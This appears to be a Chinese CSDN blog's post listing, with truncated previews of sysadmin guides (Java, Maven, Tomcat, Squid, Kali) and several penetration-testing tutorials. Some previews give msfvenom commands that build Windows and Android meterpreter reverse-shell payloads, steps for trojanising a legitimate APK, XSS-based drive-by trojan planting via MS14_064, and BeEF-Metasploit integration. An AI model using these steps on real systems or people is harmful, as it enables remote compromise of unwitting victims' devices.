![](https://img-blog.csdnimg.cn/20201014180756738.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
教程
bingxinid
bingxinid
展开
-
XSS漏洞,通过XSS实现网页挂马
首先我们的目标是一个存在存储型 XSS 漏洞的网页,看过我前面文章的小伙伴们应该知道,DVWA 平台上就有专门给我们练习存储型 XSS 漏洞的页面,我们就通过这个网页来实践挂马。2、将木马服务器的URL,插入到一个存在存储型XSS漏洞的正常web服务器中,一旦有人访问该服务器的挂马页面,而且该用户存在MS14_064漏洞,就会中招。攻击载荷模块(payload),目标系统被成功渗透后执行的代码,payload 中的主要内容包括 shellcode,一段获取 shell 的代码。原创 2023-02-11 18:36:36 · 2174 阅读 · 1 评论 -
TOR下载和网桥配置教程
TOR下载和网桥配置教程原创 2022-07-30 23:32:59 · 107209 阅读 · 50 评论 -
VPS初始化设置
一、创建普通管理员账户创建普通用户这里我们使用 adduser 命令创建一个名为 herald 的用户,执行命令后,系统会交互询问密码、全名等一系列问题,除密码外,其他信息都可不填。实际的用户名请按需修改#adduser herald将用户添加到 sudo 用户组使用 usermod 命令,附加 -aG 参数,将用户 herald 添加到 sudo 用户组。#usermod -aG sudo herald-aG 参数可以在保持用户原有用户组设置的前提下,将用户追加到指定的用户组。原创 2021-11-22 22:49:26 · 1360 阅读 · 0 评论 -
windows/android后门的维持
搭建环境:kali linux,MSFwindons后门维持// 先创建一个后门payloadmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=4444 -f exe > /root/Desktop/windowsPayload.exe// 打开msf控制台,并完成相关设置msfconsoleuse exploit/multi/handlerset payload windows/meterpr原创 2021-08-09 22:39:24 · 585 阅读 · 0 评论 -
squid代理教程
1,vps安全组开放端口规则2,yum install squid -y3,yum install httpd-tools -y4,cd /etc/squid5,htpasswd -c /etc/squid/passwd 设置的账号,回车输密码后,会生成/etc/squid/passwd文件6,vi etc/squid/squid.confhttp_port 57000via offforwarded_for deleteauth_param basic program /usr/lib原创 2021-11-22 22:51:00 · 713 阅读 · 0 评论 -
Android payload注入
参考了网络很多大神文章,简单小结一下,仅供参考1,msfvenom -p android/meterpreter/reverse_tcp LHOST=本机IP LPORT=监听端口号 -o virus.apk2,apktook反编译virus.apk和normal.apk3,找normal.apk入口,normal.apk的androidManifest.xml文件中查找MainActivety和Launch关键词,4,找到com/xxx/xxx/MainActivety.smail文件并搜索on原创 2021-11-22 22:51:35 · 789 阅读 · 0 评论 -
beef +metasploit关联
参考了网络很多大神文章,简单小结一下,仅供参考1,配置beef的vim /usr/share/beef-xss/config.yaml,修改此文件metasploit配置为 enable:true2,配置vim /usr/share/beef-xss/extensions/metasploit/config.yaml,修改此文件配置两处ip为kali自身ip3,首次启动msf,先启动postgresql数据库服务service postgresql restart,再启动msfconsole4,ms原创 2021-07-24 10:30:24 · 363 阅读 · 0 评论 -
APK TOOL配置教程
首先下载apktool.jar并放到apktool文件夹需要反编译demo.apk放在apktool的相同文件夹内cmd命令行进入apk.jar所在文件路径APK反编译:java -jar apktool.jar d -f D:\Tools\apktool\demo.apk修改完成后进行APK回编译:java -jar apktool.jar b D:\Tools\apktool\demo回编译生成的apk文件在…\dist目录下(可以搜索.apk),找到回编译的apk后下一步就需要签名了cmd原创 2021-07-24 10:28:15 · 1447 阅读 · 0 评论 -
解除宝塔面板强制绑定手机号教程
通过ssh连接服务器连接成功后输入以下命令:执行命令 vi /www/server/panel/BTPanel/static/js/index.js然后按下 i编辑 ,找到代码“if (bind_user == ‘True’) {show_force_bind();}”删除后按 esc 然后输入 : wq强制写入退出 然后回车浏览器刷新缓存后弹窗没了...原创 2021-07-24 10:25:26 · 1835 阅读 · 0 评论 -
VPS安装Linux系统_虚拟机方式
1,官网下载Linux镜像2,查看VPS厂商支持的镜像格式,//RAW格式|QCOW2格式,VHD格式,VMDK格式3,VirtualBox创建虚拟机并记录存放虚拟机安装路径,创建对应的虚拟硬盘文件类型 //虚拟硬盘文件类型一般有VHD格式,VMDK格式4,设置好网络类型和选择导入Linux.iso文件,安装完毕后记住用户名和密码并更新软件再开启ssh5,到虚拟机安装路径会多一个后缀为VHD硬盘文件6,来到VPS控制台,点击对象存储–存储桶列表–新建存储桶–上传VHD硬盘文件–上传成功后点击详原创 2021-07-24 10:23:38 · 376 阅读 · 0 评论 -
Kali Linux更新源和软件教程
1,vi /etc/apt/sources.list //kali更新源文件–添加更新源地址并保存–不使用的源地址可注释掉2,apt-get update //更新软件源中的软件列表3,apt-get upgrade //更新已经安装的软件包本身,不处理依赖关系改变的软件包4,apt-get dist-upgrade //更新完成后再次输入软件升级,处理依赖关系改变的软件包5,apt-get clean //更新完成后清除更新过程中下载并解压的安装包,因为包安装后就没有用了6,reboo原创 2021-07-24 10:22:13 · 1468 阅读 · 0 评论 -
SSH&ProxyChains配置教程
debian&ubuntu SSH配置vi /etc/ssh/sshd_config //SSH代理服务端配置Port 22 监听端口 //PermitRootLogin yes //登陆打开PasswordAuthentication yes //允许密码service ssh restart //启动服务netstat -pantu | grep :22 netstat -antp | grep sshd // 查看22端口是否启动原创 2021-07-24 10:18:14 · 421 阅读 · 0 评论 -
JDK环境变量配置
1,搜索引擎搜索对应"jdk"下载-安装2,java安装目录右键-属性-安全-编辑权限 //不然会报错3,电脑–属性–高级系统设置–高级–环境变量–新建系统变量名,变量值–添加到pathJAVA_HOME C:\Program Files\Java\jdk-11CLASSPATH .;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar;path ;%JAVA_HOME%\bin;%JAVA_原创 2021-07-24 10:13:56 · 96 阅读 · 0 评论 -
Squid代理
1,yum install squid -y //安装suid2,yum install httpd-tools -y //安装工具3,cd /etc/squid/ //进入目录4,ls //显示列表5,mv squid.conf suid.conf.bak //备份6,vi squid.conf //编辑配置文件并添加代码http_port 57000http_access allow allvia offforwarded_for delete7,syste原创 2021-07-24 09:43:57 · 213 阅读 · 0 评论 -
目录遍历漏洞
0x001 漏洞简介目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令。0x002 漏洞原理目录遍历漏洞原理比较简单,就是程序在实现上没有充分过滤用户输入的…/之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。这里的目录跳转符可以是…/,也可是…/的ASCII编码或者是unicode编码等。原创 2021-07-18 22:09:15 · 824 阅读 · 2 评论 -
云服务器安装KALI教程
没啥好说的,基本都会,不会的联系我就好啦,本人空闲时免费安装给爱学习的你!!QQ:327998355原创 2020-08-30 00:32:04 · 1493 阅读 · 1 评论 -
陀螺世界教程
今天给大家录制一期陀螺世界游戏app源码养牛广告收益分红模式以及搭建详细视频教程安装说明为下列环境是apache2.4 +mysql5.6以上 (必须要这个环境 本人测试NG 是无法运行的 )php7.3版本 ( 4g4h5m 这是最基本的配置 低了带不起来 )导入数据修改数据库配置文件: (这里已经提前上传了 自己上传 这些都不需要讲)config/database.php (修改数...原创 2020-02-28 11:41:26 · 658 阅读 · 2 评论 -
幽冥传奇
JAVA环境添加setx /M JAVA_HOME “D:\YM-cnmmm.com\bl20166\Java\jdk1.8.0_144”setx /M CLASSPATH “.;%%JAVA_HOME%%\lib\dt.jar;%%JAVA_HOME%%\lib\tools.jar”setx /M PATH “%PATH%;%%JAVA_HOME%%\bin”游戏解压到D盘:D:\YM...原创 2020-01-16 09:48:31 · 2025 阅读 · 0 评论 -
linux¢os基本命令
centos基本命令#---------------------------#CentOS Windows##>ls cmd>dir //##>ls --help //查看命令帮助##>man ls //查看命令帮助###>clear cmd>cls //清屏##>...原创 2020-01-04 21:26:59 · 207 阅读 · 0 评论 -
域名服务的工作流程
## 域名服务的工作流程比如我们向www.baidu.com发出请求, 执行流程则是:1,C:\Windows\System32\drivers\etc \hosts文件中去寻找域名和ip映射信息1.1,如果本地hosts文域名件中没有该域名ip信息,就会向外部DNS服务器查询2,如果从DNS拿到域名和IP信息,就会向WEB服务器发出真实请求,如下图...原创 2020-01-03 12:09:39 · 308 阅读 · 0 评论 -
HTML和CSS归档基础知识
## HTML和CSS归档基础知识前端好久没看找了资料归档了下,HTML和CSS基本东西,深入请下载***w3cschool.CHM***0,form表单格式案例0,<!-- form表单 form:用户输入数据,它采集用户数据 * action:指定提交的URL ...原创 2020-01-03 09:51:52 · 277 阅读 · 0 评论 -
JAVA环境变量配置教程(window和Linux)
**windows/Linux系统Java环境变量设置**1,java官方下载地址2,打开电脑-高级环境变量-高级-环境变量-新建,变量=JAVA_HOME,变量值=C:\Program Files\Java\jdk1.8.0_162(自己路径)3,打开电脑-高级环境变量-高级-环境变量-新建,变量=CLASSPATH,变量值= .;%JAV...原创 2020-01-02 13:24:04 · 304 阅读 · 0 评论 -
Maven环境配置和本地仓库和远程仓库配置及常用命令
1,从官网下载maven,下载地址2,解压后文件,知道自己路径,如我的D:\ALLTOOLS\maven3,打开控制面板\所有控制面板项\系统\高级系统设置\环境变量\系统变量,新建变量为MAVEN_HOME,变量值为D:\ALLTOOLS\Maven4,环境配置好后,测试下,打开cmd,输入mvn -v,出现maven信息后配置成功5,我们打开maven目录,找到settings...原创 2020-01-02 11:22:58 · 968 阅读 · 0 评论 -
Tomcat 安装环境变量配置
1,打开Tomcat文件夹路径java环境变量配置教程_链接地址2,按windows+E按键3,按windows+R按键,运行框输入control4,找到系统选项5,点击高级系统设置6,找到环境变量并且点开7,点击新建系统变量8,输入变量名CATALINA_HOME和变量值D:\ALLTOOLS\apache-tomcat-...原创 2019-12-31 11:26:28 · 464 阅读 · 0 评论 -
宝塔忘记端口,解决办法
1,登陆远程连接,输入ll2,输入cd后再ll3,清下屏,输入clear4,输入cd www/server/panel/data,找到port.pl5,输入cat port.pl查看端口,通过vi修改端口6,也可输入netstat -ntpl看监听端口7,修改端口后按下shift+:再加wq(写入退出)8,远程开启端口,输入vi /etc/...原创 2019-12-29 15:10:26 · 4266 阅读 · 0 评论 -
颂游搭建教程
1,伪静态规则:location /qp_host/ { if (!-e $request_filename){ rewrite ^/qp_host/(.*)$ /qp_host/index.php?s=$1 last; }} location /qp_ht/ { if (!-e $request_filena...原创 2019-12-29 14:04:00 · 1218 阅读 · 0 评论